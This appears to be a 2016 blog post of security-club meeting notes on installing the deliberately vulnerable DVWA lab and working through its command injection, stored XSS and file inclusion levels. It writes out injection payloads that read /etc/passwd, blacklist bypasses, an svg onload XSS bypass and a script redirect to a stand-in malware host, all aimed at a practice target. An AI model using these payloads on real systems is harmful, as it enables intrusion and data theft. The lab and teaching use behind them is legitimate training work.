---
layout: post
tagline: "Web Exploitation: DVWA"
date: 2016-10-25
categories: Meetings
---

# Matthews Notes

## Installing DVWA on kali.

download DVWA:
http://www.dvwa.co.uk/


unzip it and put it in /var/www/html
mv DVWA-1.9/ /dvwa
chmod -R 755 dvwa
sudo service mysql start
mysql -u root -p
create database dvwa;
exit
nano dvwa/config/config.inc.php and change the db_password to ''
service apache2 start
go to /dvwa/setup.php

Fixing some permission errors:
chgrp www-data dvwa/hackable/uploads/
chmod g+w dvwa/hackable/uploads/
chgrp www-data dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
chmod g+w dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt

to get php-gd we need to add a repo.
nano /etc/apt/sources.list

at the end of the file add:
deb http://repo.kali.org/kali kali-rolling main non-free contrib 
and save the file.

apt-get update
apt-get install php-gd

nano /etc/php5/apache2/php.ini
change allow_url_include from Off to On
service apache2 restart

Now we're good to start!
You could try to brute force to login using burpsuite, but the default security setting is impossible.
So use : 
username:admin 
password:password


## Command Injection

Security: low

Heres we can see at /var/www/html/dvwa/vulnerabilities/exec/source/low.php that there is no blacklist,

so we can simply provide another command using the semicolon and it will execute the second one.

127.0.0.1; cat /etc/passwd

Security: medium

looking at /var/www/html/dvwa/vulnerabilities/exec/source/medium.php we can see a blacklist has been added to remove &&, and ;
This means we can no longer do our low solution.

Theres this handy thing called a pipe "|", so what if we use it instead of a semi colon.

We can send 
127.0.0.1 | cat /etc/passwd

we could also do 
127.0.0.1 &;& cat /etc/passwd 
thus recreating && since the semicolon is santized.
&& executes a command if the previous one worked.

Hey it works!

Security: high

We have quite the blacklist for this one which prevents us from using a number of special characters. Unless we can somehow bypass the blacklist

The description for high level says "The developer has either made a slight typo with the filters, and believes a certain PHP command will save them from this mistake
We can see they accidently only put one '&' instead of two. 
The command different between medium and high is the trim command which strips whitespace from the beginning and end of the command
This means whitespace in the middle of a command is perfectly safe from trimming
What if we had something like \n which is treated like whitespace, we could use characters like this 

It doesn't work for some reason

## XSS Stored

Security: low
Here we can do a simple xss, and do
alert("XSS")
in <script> tags
do change this to redirection to some website, simply replace 'alert("XSS")' with
document.location='http://evilsite.com/malware'

Security: medium
Here we can see they are filtering message box pretty well, but its different for the name field, so we'll start there
It is looking for '<script>' so we can just provide a different but equivalent string, like
'<ScRiPt>' , doing this allows our previous test to work
alert("XSS")
in <ScRiPt> tags

Security: high

Here they are filtering out anything that looks like script, so we have to use something else.
<svg onload=prompt('xss')>


## File Inclusion

By clicking on the example files we can see that they are dynamically running them to gather information,
this means that we could inject code into them, and similar to an XSS attack, run whatever we want on this website

Security: low

There are two types of exploits here, Local Files (LF) which are stored on the site.
and Remote Files (RF) which are not, but that doesn't mean we can't do anything about them.
